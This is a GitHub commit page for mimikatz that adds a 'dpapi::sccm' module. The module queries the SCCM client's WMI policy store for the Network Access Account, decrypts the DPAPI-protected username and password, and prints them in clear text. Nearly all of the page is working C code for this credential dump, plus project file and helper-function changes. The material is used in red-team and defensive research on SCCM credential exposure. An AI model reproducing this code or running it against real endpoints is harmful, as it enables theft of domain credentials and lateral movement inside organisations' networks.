[new] mimikatz dpapi::sccm to dump Network Accounts on endpoints

drotha2 · May 12, 2021 · c54f416 · c54f416
1 parent 5e5771e
commit c54f416
Show file tree

Hide file tree

Showing 8 changed files with 215 additions and 0 deletions.
diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj
@@ -176,6 +176,7 @@
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_lunahsm.c" />
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_powershell.c" />
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_rdg.c" />
+    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_sccm.c" />
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_ssh.c" />
     <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_wlan.c" />
     <ClCompile Include="modules\kerberos\kuhl_m_kerberos.c" />
@@ -288,6 +289,7 @@
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_lunahsm.h" />
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_powershell.h" />
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_rdg.h" />
+    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_sccm.h" />
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_ssh.h" />
     <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_wlan.h" />
     <ClInclude Include="modules\kerberos\kuhl_m_kerberos.h" />

diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters
@@ -317,6 +317,9 @@
     <ClCompile Include="..\modules\rpc\kull_m_rpc_ms-rprn.c">
       <Filter>common modules\rpc</Filter>
     </ClCompile>
+    <ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_sccm.c">
+      <Filter>local modules\dpapi\packages</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="mimikatz.h" />
@@ -653,6 +656,9 @@
     <ClInclude Include="..\modules\rpc\kull_m_rpc_ms-rprn.h">
       <Filter>common modules\rpc</Filter>
     </ClInclude>
+    <ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_sccm.h">
+      <Filter>local modules\dpapi\packages</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <Filter Include="local modules">

diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.c b/mimikatz/modules/dpapi/kuhl_m_dpapi.c
@@ -26,6 +26,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
 	{kuhl_m_dpapi_lunahsm,		L"luna",		L"Safenet LunaHSM KSP"},
 	{kuhl_m_dpapi_cloudap_keyvalue_derived,	L"cloudapkd",	L""},
 	{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg",	L""},
+	{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm",	L""},
 	{kuhl_m_dpapi_oe_cache,		L"cache", NULL},
 };
 const KUHL_M kuhl_m_dpapi = {

diff --git a/mimikatz/modules/dpapi/kuhl_m_dpapi.h b/mimikatz/modules/dpapi/kuhl_m_dpapi.h
@@ -19,6 +19,7 @@
 #include "packages/kuhl_m_dpapi_powershell.h"
 #include "packages/kuhl_m_dpapi_lunahsm.h"
 #include "packages/kuhl_m_dpapi_cloudap.h"
+#include "packages/kuhl_m_dpapi_sccm.h"
 
 const KUHL_M kuhl_m_dpapi;
 

diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.c b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.c
@@ -0,0 +1,155 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	[email protected]
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_dpapi_sccm.h"
+
+NTSTATUS kuhl_m_dpapi_sccm_networkaccessaccount(int argc, wchar_t * argv[])
+{
+	IWbemLocator *pLoc = NULL;
+	IWbemServices *pSvc = NULL;
+	IEnumWbemClassObject* pEnumerator = NULL;
+	IWbemClassObject *pclsObj = NULL;
+	ULONG uReturn = 0;
+	VARIANT vtGeneric;
+	HRESULT hr, hrEnum;
+
+	PSCCM_Policy_Secret pPolicySecret;
+	DWORD cbPolicySecret;
+	LPVOID pDataOut;
+	DWORD dwDataOutLen;
+	ULONGLONG ullLastUpdate;
+
+	hr = CoCreateInstance(&CLSID_WbemLocator, NULL, CLSCTX_INPROC_SERVER, &IID_IWbemLocator, (LPVOID *) &pLoc);
+	if(hr == S_OK)
+	{
+		hr = IWbemLocator_ConnectServer(pLoc, L"root\\ccm\\Policy\\Machine\\RequestedConfig", NULL, NULL, NULL, 0, NULL, NULL, &pSvc); // ActualConfig
+		if(hr == S_OK)
+		{
+			hr = CoSetProxyBlanket((IUnknown*)pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
+			if(hr == S_OK)
+			{
+				hr = IWbemServices_ExecQuery(pSvc, L"WQL", L"SELECT * FROM CCM_NetworkAccessAccount", WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator);
+				if(hr == S_OK)
+				{
+					do
+					{
+						hrEnum = IEnumWbemClassObject_Next(pEnumerator, WBEM_INFINITE, 1, &pclsObj, &uReturn);
+						if(hrEnum == S_OK)
+						{
+							kprintf(L"\n");
+							if(uReturn)
+							{
+								hr = IWbemClassObject_Get(pclsObj, L"PolicyID", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									kprintf(L"PolicyID      : %s\n", vtGeneric.bstrVal);
+									VariantClear(&vtGeneric);
+								}
+
+								hr = IWbemClassObject_Get(pclsObj, L"PolicyVersion", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									kprintf(L"PolicyVersion : %s\n", vtGeneric.bstrVal);
+									VariantClear(&vtGeneric);
+								}
+
+								hr = IWbemClassObject_Get(pclsObj, L"PolicySource", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									kprintf(L"PolicySource  : %s\n", vtGeneric.bstrVal);
+									VariantClear(&vtGeneric);
+								}
+
+								hr = IWbemClassObject_Get(pclsObj, L"LastUpdateTime", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									ullLastUpdate = _wcstoui64(vtGeneric.bstrVal, NULL, 10);
+									kprintf(L"LastUpdateTime: ");
+									kull_m_string_displayLocalFileTime((PFILETIME) &ullLastUpdate);
+									kprintf(L"\n");
+									VariantClear(&vtGeneric);
+								}
+
+								hr = IWbemClassObject_Get(pclsObj, L"NetworkAccessUsername", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									kprintf(L"DPAPI Username: %s\n", vtGeneric.bstrVal);
+									if(kuhl_m_dpapi_sccm_XML_Data_to_bin(vtGeneric.bstrVal, &pPolicySecret, &cbPolicySecret))
+									{
+										if(kuhl_m_dpapi_unprotect_raw_or_blob(pPolicySecret->data, pPolicySecret->cbData, NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
+										{
+											kprintf(L"Clear Username: %.*s\n", dwDataOutLen / sizeof(wchar_t), pDataOut);
+											LocalFree(pDataOut);
+										}
+										LocalFree(pPolicySecret);
+									}
+									VariantClear(&vtGeneric);
+								}
+								else PRINT_ERROR(L"IWbemClassObject_Get(NetworkAccessUsername): 0x%08x\n", hr);
+
+								hr = IWbemClassObject_Get(pclsObj, L"NetworkAccessPassword", 0, &vtGeneric, 0, 0);
+								if(hr == S_OK)
+								{
+									kprintf(L"DPAPI Password: %s\n", vtGeneric.bstrVal);
+									if(kuhl_m_dpapi_sccm_XML_Data_to_bin(vtGeneric.bstrVal, &pPolicySecret, &cbPolicySecret))
+									{
+										if(kuhl_m_dpapi_unprotect_raw_or_blob(pPolicySecret->data, pPolicySecret->cbData, NULL, argc, argv, NULL, 0, &pDataOut, &dwDataOutLen, NULL))
+										{
+											kprintf(L"Clear Password: %.*s\n", dwDataOutLen / sizeof(wchar_t), pDataOut);
+											LocalFree(pDataOut);
+										}
+										LocalFree(pPolicySecret);
+									}
+									VariantClear(&vtGeneric);
+								}
+								else PRINT_ERROR(L"IWbemClassObject_Get(NetworkAccessPassword): 0x%08x\n", hr);
+
+								IWbemClassObject_Release(pclsObj);
+							}
+							else PRINT_ERROR(L"no return?\n");
+						} 
+						else if(hrEnum != S_FALSE) PRINT_ERROR(L"IEnumWbemClassObject_Next: 0x%08x\n", hrEnum);
+
+					} while(hrEnum == S_OK);
+
+					IEnumWbemClassObject_Release(pEnumerator);
+				}
+				else PRINT_ERROR(L"IWbemServices_ExecQuery: 0x%08x\n", hr);
+			}
+			else PRINT_ERROR(L"CoSetProxyBlanket: 0x%08x\n", hr);
+
+			IWbemServices_Release(pSvc);
+		}
+		else PRINT_ERROR(L"IWbemLocator_ConnectServer: 0x%08x\n", hr);
+
+		IWbemLocator_Release(pLoc);
+	}
+	else PRINT_ERROR(L"CoCreateInstance: 0x%08x\n", hr);
+
+	return STATUS_SUCCESS;
+}
+
+BOOL kuhl_m_dpapi_sccm_XML_Data_to_bin(BSTR szData, PSCCM_Policy_Secret * ppPolicySecret, PDWORD pcbPolicySecret)
+{
+	BOOL status = FALSE;
+	wchar_t *ptrBegin, *ptrEnd;
+	DWORD cbChar;
+
+	ptrBegin = wcsstr(szData, L"<PolicySecret Version=\"1\"><![CDATA[");
+	if(ptrBegin == szData)
+	{
+		ptrBegin += 35;
+		ptrEnd = wcsstr(ptrBegin, L"]]></PolicySecret>");
+		if(ptrEnd)
+		{
+			cbChar = (DWORD) (ptrEnd - ptrBegin);
+			status = kull_m_crypto_StringToBinaryW(ptrBegin, cbChar, CRYPT_STRING_HEX, (PBYTE *) ppPolicySecret, pcbPolicySecret);
+		}
+		else PRINT_ERROR(L"Unable to find end\n");
+	}
+	else PRINT_ERROR(L"Unable to find begin\n");
+
+	return status;
+}
diff --git a/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.h b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_sccm.h
@@ -0,0 +1,19 @@
+/*	Benjamin DELPY `gentilkiwi`
+	https://blog.gentilkiwi.com
+	[email protected]
+	Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_dpapi.h"
+#include "../../../../modules/kull_m_string.h"
+#include "../../../../modules/kull_m_crypto.h"
+#include <wbemidl.h>
+
+typedef struct _SCCM_Policy_Secret {
+	DWORD cbData;
+	BYTE data[ANYSIZE_ARRAY];
+} SCCM_Policy_Secret, *PSCCM_Policy_Secret;
+
+NTSTATUS kuhl_m_dpapi_sccm_networkaccessaccount(int argc, wchar_t * argv[]);
+
+BOOL kuhl_m_dpapi_sccm_XML_Data_to_bin(BSTR szData, PSCCM_Policy_Secret * ppPolicySecret, PDWORD pcbPolicySecret);
diff --git a/modules/kull_m_crypto.c b/modules/kull_m_crypto.c
@@ -1330,5 +1330,34 @@ BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFl
 	}
 	else PRINT_ERROR_AUTO(L"CryptStringToBinaryA(init)");
 
+	return status;
+}
+
+BOOL kull_m_crypto_StringToBinaryW(LPCWSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary)
+{
+	BOOL status = FALSE;
+
+	*ppbBinary = NULL;
+	*pcbBinary = 0;
+
+	if (CryptStringToBinaryW(pszString, cchString, dwFlags, NULL, pcbBinary, NULL, NULL))
+	{
+		*ppbBinary = (PBYTE)LocalAlloc(LPTR, *pcbBinary);
+		if (*ppbBinary)
+		{
+			if (CryptStringToBinaryW(pszString, cchString, dwFlags, *ppbBinary, pcbBinary, NULL, NULL))
+			{
+				status = TRUE;
+			}
+			else
+			{
+				PRINT_ERROR_AUTO(L"CryptStringToBinaryW(data)");
+				*ppbBinary = (PBYTE)LocalFree(*ppbBinary);
+				*pcbBinary = 0;
+			}
+		}
+	}
+	else PRINT_ERROR_AUTO(L"CryptStringToBinaryW(init)");
+
 	return status;
 }
diff --git a/modules/kull_m_crypto.h b/modules/kull_m_crypto.h
@@ -199,7 +199,9 @@ PKIWI_DH kull_m_crypto_dh_Create(ALG_ID targetSessionKeyType);
 BOOL kull_m_crypto_dh_CreateSessionKey(PKIWI_DH dh, PMIMI_PUBLICKEY publicKey);
 BOOL kull_m_crypto_dh_simpleEncrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
 BOOL kull_m_crypto_dh_simpleDecrypt(HCRYPTKEY key, LPVOID data, DWORD dataLen, LPVOID *out, DWORD *outLen);
+
 BOOL kull_m_crypto_StringToBinaryA(LPCSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary);
+BOOL kull_m_crypto_StringToBinaryW(LPCWSTR pszString, DWORD cchString, DWORD dwFlags, PBYTE* ppbBinary, PDWORD pcbBinary);
 
 #define IOCTL_GET_FEATURE_REQUEST			SCARD_CTL_CODE(3400)
 #define IOCTL_CCID_ESCAPE					SCARD_CTL_CODE(3500)